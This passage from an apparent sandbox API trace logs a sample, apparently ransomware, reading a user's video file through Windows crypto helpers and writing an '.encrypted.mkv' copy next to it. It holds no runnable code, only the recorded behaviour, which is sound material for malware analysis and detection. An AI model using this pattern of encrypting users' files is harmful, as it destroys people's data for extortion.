lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.386] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.386] CryptDestroyHash (hHash=0x7c2100) returned 1 [0043.386] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.386] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\9qof4ezmoy.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.386] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.386] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.388] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw")) returned 0x10 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\9qof4ezmoy.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.389] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0043.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0043.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.391] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.391] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xe9d3, lpOverlapped=0x0) returned 1 [0043.393] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe9d3) returned 0xac2018 [0043.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe9d3) returned 0xad09f8 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe9d3) returned 0xac2018 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.396] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.396] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.396] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe9d3) returned 0xac2018 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0043.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0043.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe9d3) returned 0x935008 [0043.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0043.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.399] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: 